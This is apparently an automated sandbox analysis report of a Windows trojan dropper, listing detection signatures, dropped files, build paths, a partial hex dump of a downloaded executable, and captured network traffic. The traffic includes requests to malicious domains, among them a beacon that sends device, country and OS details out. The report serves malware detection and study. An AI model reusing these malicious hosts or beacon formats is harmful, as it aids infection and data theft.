Windows Analysis Report 1nJGU59JPU

Overview

General Information

Sample Name:	1nJGU59JPU (renamed file extension from none to exe)
Analysis ID:	553343
MD5:	aea21ab88cca720a34ec1c9c4794f82a
SHA1:	5241d6fd4013ec8251df46e231665471a8ca70db
SHA256:	498421bc4c78ba9bf7c9d669bd9958cf2c0c1cc89e94288800fe004400821ef3
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Performs DNS queries to domains with low reputation

Connects to many IPs within the same subnet mask (likely port scanning)

Drops executable to a common third party application directory

.NET source code contains method to dynamically call methods (often used by packers)

Obfuscated command line found

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Stores files to the Windows start menu directory

Too many similar processes found

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

Connects to many different domains

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Contains functionality to launch a program with higher privileges

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://vexacion.com/afu.php?zoneid=1851513	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1492888&syncedCookie=true	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483leSystem	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1851513&syncedCookie=false	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483z	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1343177&var=3	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1851483&syncedCookie=false	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1294231&syncedCookie=false	Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483C:	Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1339680&syncedCookie=false	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Avira: detection malicious, Label: TR/Dldr.Agent.pwjwe
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Avira: detection malicious, Label: HEUR/AGEN.1139393

Multi AV Scanner detection for submitted file

Source: 1nJGU59JPU.exe	Virustotal: Detection: 25%	Perma Link
Source: 1nJGU59JPU.exe	Metadefender: Detection: 31%	Perma Link
Source: 1nJGU59JPU.exe	ReversingLabs: Detection: 57%

Antivirus / Scanner detection for submitted sample

Source: 1nJGU59JPU.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Metadefender: Detection: 20%	Perma Link
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	ReversingLabs: Detection: 78%
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Metadefender: Detection: 34%	Perma Link
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	ReversingLabs: Detection: 77%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.1.1nJGU59JPU.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.1nJGU59JPU.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.0.1nJGU59JPU.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49754 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49764 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 51.159.62.6:443 -> 192.168.2.3:49768 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50077 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:50416 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50854 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50856 version: TLS 1.0

Uses 32bit PE files

Source: 1nJGU59JPU.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.61:443 -> 192.168.2.3:50399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50398 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50646 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.225:443 -> 192.168.2.3:50851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.164.165:443 -> 192.168.2.3:50853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.188:443 -> 192.168.2.3:50879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.71.70:443 -> 192.168.2.3:50883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.240:443 -> 192.168.2.3:50884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.243:443 -> 192.168.2.3:50889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50930 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.5.229:443 -> 192.168.2.3:50933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.27.252:443 -> 192.168.2.3:50935 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe.config	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

Source: 1nJGU59JPU.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: updater.pdbh source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: Publisher.pdbX source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb` source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source:	Binary string: Recover.pdbh> source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb,"nbreDay": source: 7((_8888YTR(.exe, 00000003.00000002.324111810.0000000002E1A000.00000004.00000001.sdmp
Source:	Binary string: Recover.pdb source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: I-Record.pdb8 source: 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: updater.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source:	Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdbF source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp
Source:	Binary string: I-Record.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source:	Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp
Source:	Binary string: e:\mydev\inno-download-plugin\ansi\idp.pdb source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp
Source:	Binary string: Publisher.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00452AD4 FindFirstFileA,GetLastError,	1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,	1_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00498FDC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00475798 FindFirstFileA,FindNextFileA,FindClose,	1_2_00475798

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2032327 ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2 192.168.2.3:49778 -> 139.45.197.236:80
Source: Traffic	Snort IDS: 2032327 ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2 192.168.2.3:49776 -> 139.45.197.236:80
Source: Traffic	Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:57236 -> 34.64.183.91:53

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

DNS query: www.cloud-security.xyz

Connects to many IPs within the same subnet mask (likely port scanning)

Source: global traffic

TCP traffic: Count: 16 IPs: 13.224.96.29,13.224.96.28,13.224.96.4,13.224.96.6,13.224.96.30,13.224.96.122,13.224.96.86,13.224.96.58,13.224.96.15,13.224.96.45,13.224.96.106,13.224.96.80,13.224.96.124,13.224.96.72,13.224.96.103,13.224.96.84

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 136Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D HTTP/1.1Host: htagzdownload.pwConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 264Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Length: 571904x-amz-id-2: txa1eb6ccc970d468cbdbb0-0061e1abdaAccept-Ranges: bytesLast-Modified: Mon, 10 Jan 2022 12:30:09 GMTETag: "f97d18bae067594234dc3ea8e06d10a1"x-amz-request-id: txa1eb6ccc970d468cbdbb0-0061e1abdax-amz-version-id: 1641817806697520Content-Type: application/octet-streamDate: Fri, 14 Jan 2022 16:59:06 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8e 7b 52 fc 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 07 00 00 40 01 00 00 00 00 00 5e 94 07 00 00 20 00 00 00 a0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 10 94 07 00 4b 00 00 00 00 c0 07 00 54 39 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 0c 00 00 00 cb 93 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 74 07 00 00 20 00 00 00 76 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f8 02 00 00 00 a0 07 00 00 04 00 00 00 7a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 54 39 01 00 00 c0 07 00 00 3a 01 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 09 00 00 02 00 00 00 b8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49754 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49764 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 51.159.62.6:443 -> 192.168.2.3:49768 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50077 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:50416 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50854 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50856 version: TLS 1.0

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 102

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

UDP traffic: 192.168.2.3:60138 -> 142.250.154.127:19302

Connects to several IPs in different countries

Source: unknown

Network traffic detected: IP country count 11

Source: 7((_8888YTR(.exe, 00000003.00000002.323750858.0000000002C9C000.00000004.00000001.sdmp	String found in binary or memory: http://360devtracking.com
Source: 7((_8888YTR(.exe, 00000003.00000002.323919834.0000000002D62000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp	String found in binary or memory: http://360devtracking.com/jkzhnzhedxagwdqp/suybdffapqeffezs
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: http://accounts.google.com/
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: http://accounts.google.com/r
Source: chrome.exe, 00000017.00000003.372345068.000001AC63EC6000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.380018041.000001AC60655000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390793589.000001AC60656000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396124354.0000018BEE694000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404252936.0000018BEE698000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400658455.0000018BEE697000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe-
Source: chrome.exe, 00000017.00000002.403234818.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.387763712.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.393863059.0000018BF1F07000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414108310.0000018BF1F07000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000017.00000002.403234818.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.387763712.000001AC63EA4000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/time/1/currentL
